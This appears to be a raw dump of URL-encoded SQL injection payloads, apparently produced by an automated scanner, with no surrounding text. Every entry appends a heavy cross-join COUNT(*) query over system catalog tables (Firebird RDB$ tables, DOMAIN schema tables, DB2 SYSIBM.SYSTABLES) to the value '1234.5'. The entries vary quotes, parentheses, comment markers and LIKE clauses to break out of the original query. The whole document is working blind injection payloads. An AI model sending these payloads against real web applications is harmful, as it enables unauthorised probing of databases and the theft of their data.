1234.5%27%2B%28SELECT%20wOWh%20WHERE%209945%3D9945%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%2B%28SELECT%20%27IwPz%27%20WHERE%206879%3D6879%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%201193%3D%28SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%2CRDB%24FUNCTIONS%20AS%20T4%29-- 1234.5%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1234.5%27%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1234.5%27%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1234.5%22%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1234.5%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%283806%3D3806 1234.5%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%289299%3D9299 1234.5%29%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%287605%3D7605 1234.5%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29 1234.5%27%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27dnRD%27%3D%27dnRD 1234.5%27%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27QBsu%27%3D%27QBsu 1234.5%27%29%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27sFQu%27%3D%27sFQu 1234.5%27%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27lDtd%27%3D%27lDtd 1234.5%27%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27qksA%27%20LIKE%20%27qksA 1234.5%27%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27fMJD%27%20LIKE%20%27fMJD 1234.5%27%29%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27Seac%27%20LIKE%20%27Seac 1234.5%27%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27Nbur%27%20LIKE%20%27Nbur 1234.5%22%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22frdS%22%3D%22frdS 1234.5%22%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22lCuR%22%3D%22lCuR 1234.5%22%29%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22JDLr%22%3D%22JDLr 1234.5%22%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22tWpc%22%3D%22tWpc 1234.5%22%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%22HbEB%22%20LIKE%20%22HbEB 1234.5%22%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%22wMXH%22%20LIKE%20%22wMXH 1234.5%22%29%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%22xNUs%22%20LIKE%20%22xNUs 1234.5%22%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%22eFXO%22%20LIKE%20%22eFXO 1234.5%25%27%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 1234.5%25%27%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%28%27ioFi%27%3D%27ioFi 1234.5%00%27%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20AND%20%27iZKM%27%3D%27iZKM 1234.5%27%29%20WHERE%206700%3D6700%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1234.5%22%29%20WHERE%207580%3D7580%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1234.5%29%20WHERE%204174%3D4174%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1234.5%27%20WHERE%203600%3D3600%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1234.5%22%20WHERE%203176%3D3176%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1234.5%20WHERE%207842%3D7842%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27TTxB%27%20FROM%20DUAL%20WHERE%208349%3D8349%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27Hvfz%27%20WHERE%207046%3D7046%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20Dndg%20WHERE%209120%3D9120%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27RHFa%27%20WHERE%206667%3D6667%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%205499%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29%20%23 1234.5%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%29%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%29%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%29%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%25%27%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%25%27%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%25%27%29%29%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%25%27%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%00%27%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%00%27%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%29%20WHERE%201267%3D1267%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%29%20WHERE%201312%3D1312%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%29%20WHERE%201025%3D1025%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%20WHERE%202101%3D2101%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%22%20WHERE%207214%3D7214%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%20WHERE%205355%3D5355%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%7C%7C%28SELECT%20%27GiPm%27%20FROM%20DUAL%20WHERE%209689%3D9689%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%7C%7C%28SELECT%20%27wWVM%27%20WHERE%207744%3D7744%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%2B%28SELECT%20FMMK%20WHERE%209864%3D9864%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%2B%28SELECT%20%27rdnD%27%20WHERE%209323%3D9323%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204449%3D%28SELECT%20COUNT%28%2A%29%20FROM%20DOMAIN.DOMAINS%20AS%20T1%2CDOMAIN.COLUMNS%20AS%20T2%2CDOMAIN.TABLES%20AS%20T3%29-- 1234.5%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%27%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%27%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%22%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%284500%3D4500 1234.5%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%287571%3D7571 1234.5%29%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%288123%3D8123 1234.5%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%27%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27OGPk%27%3D%27OGPk 1234.5%27%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27wIDe%27%3D%27wIDe 1234.5%27%29%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27QxFj%27%3D%27QxFj 1234.5%27%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27yZNM%27%3D%27yZNM 1234.5%27%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27kuny%27%20LIKE%20%27kuny 1234.5%27%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27Cobk%27%20LIKE%20%27Cobk 1234.5%27%29%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27WAGZ%27%20LIKE%20%27WAGZ 1234.5%27%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27NVKt%27%20LIKE%20%27NVKt 1234.5%22%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22LbLJ%22%3D%22LbLJ 1234.5%22%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22NEgc%22%3D%22NEgc 1234.5%22%29%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22UgLo%22%3D%22UgLo 1234.5%22%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22beFd%22%3D%22beFd 1234.5%22%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22PFzE%22%20LIKE%20%22PFzE 1234.5%22%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22BwYu%22%20LIKE%20%22BwYu 1234.5%22%29%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22CeaV%22%20LIKE%20%22CeaV 1234.5%22%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22ZgPi%22%20LIKE%20%22ZgPi 1234.5%25%27%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27%25%27%3D%27 1234.5%25%27%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27%25%27%3D%27 1234.5%25%27%29%29%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27%25%27%3D%27 